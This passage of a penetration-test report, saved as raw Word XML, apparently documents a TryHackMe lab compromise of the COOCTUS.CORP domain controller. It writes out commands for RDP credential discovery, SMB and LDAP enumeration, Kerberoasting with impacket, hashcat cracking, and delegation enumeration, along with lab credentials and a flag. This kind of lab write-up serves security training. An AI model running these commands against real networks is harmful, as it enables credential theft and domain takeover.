          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/backdoor.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> endpoint was investigated but did not accept commands or provide usable functionality. The recovered database credentials did not directly grant domain access, but were retained and logged as a sensitive exposure (see Finding 4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc234251542"/>
      <w:r>
        <w:rPr/>
        <w:t>3.3 Initial Access - RDP Credential Disclosure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With port 3389 exposed, the assessor connected to the host over RDP with an empty username. Before authentication, the customized Windows login screen displayed a graphical “sticky note” containing valid credentials for the Visitor account.</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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rdesktop -f -u "" 10.64.148.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 113334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33343217"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 6 - RDP session negotiation with DC.COOCTUS.CORP.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120"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Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120"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Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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Visitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>GuestLogin!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120"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RDP login-screen sticky note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3429000" cy="2066925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 116456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64562621"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3429000" cy="2066925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 7 - RDP login screen sticky note disclosing Visitor : GuestLogin!.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc234251543"/>
      <w:r>
        <w:rPr/>
        <w:t>3.4 SMB Enumeration &amp; User Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The recovered Visitor credentials were validated against SMB and used to enumerate available shares. RPC access confirmed the account was functional within the domain.</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7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Validate creds and list shares</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nxc smb 10.64.148.30 -u Visitor -p 'GuestLogin!' --shares</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Enumerate via RPC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rpcclient -U 'Visitor%GuestLogin!' 10.64.148.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Connect to the Home share and retrieve the user flag</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>smbclient //10.64.148.30/Home -U 'Visitor%GuestLogin!'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>smb&gt; get user.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">User flag captured: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>THM{Gu3st_Pl3as3}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 2078509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78509459"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 8 - SMB Home share access and retrieval of user.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc234251544"/>
      <w:r>
        <w:rPr/>
        <w:t>3.5 LDAP Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With authenticated domain access, LDAP was enumerated to map naming contexts, users, and service accounts. This established the groundwork for the Kerberoasting attack that followed.</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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ldapdomaindump 10.64.148.30 -u 'COOCTUS\Visitor' -p 'GuestLogin!'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4000500" cy="904875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 50285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02855227"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000500" cy="904875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 9 - ldapdomaindump completing a full domain dump.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3429000" cy="6477000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 194853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48530526"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3429000" cy="6477000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 10 - LDAP dump showing the COOCTUS.CORP naming contexts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc234251545"/>
      <w:r>
        <w:rPr/>
        <w:t>3.6 Kerberoasting the password-reset Account</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The assessor queried Active Directory for accounts with registered Service Principal Names (SPNs). Any user account with an SPN can be Kerberoasted - the TGS-REP portion is encrypted with the account’s password hash and can be cracked offline. The password-reset account was identified via its registered SPN (HTTP/dc.cooctus.corp).</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impacket-GetUserSPNs COOCTUS.CORP/Visitor:'GuestLogin!' \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-request -dc-ip 10.64.148.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># ServicePrincipalName   Name            Delegation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># HTTP/dc.cooctus.corp   password-reset  constrained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 49371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93711489"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="1800225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 11 - GetUserSPNs extracting the password-reset TGS-REP hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The extracted hash began with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$krb5tgs$23$</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> prefix, confirming a Kerberos 5 TGS-REP etype 23 (RC4-HMAC) hash - Hashcat mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>13100</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. It was cracked offline against rockyou.txt:</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hashcat -m 13100 -a 0 kerb_hash.txt /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Recovered credential:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>#   password-reset : resetpassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="4619625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 31664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16644671"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4619625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 12 - Hashcat cracking the password-reset ticket (mode 13100).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recovered service-account credential: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>password-reset : resetpassword</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc234251546"/>
      <w:r>
        <w:rPr/>
        <w:t>3.7 Privilege Escalation - Constrained Delegation Abuse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Delegation rights were enumerated using the newly recovered account. This revealed the critical misconfiguration that led to full domain compromise.</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impacket-findDelegation -debug COOCTUS.CORP/password-reset:resetpassword -dc-ip 10.64.148.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># AccountName     AccountType  DelegationType                      DelegationRightsTo</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># DC$             Computer     Unconstrained                       N/A</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
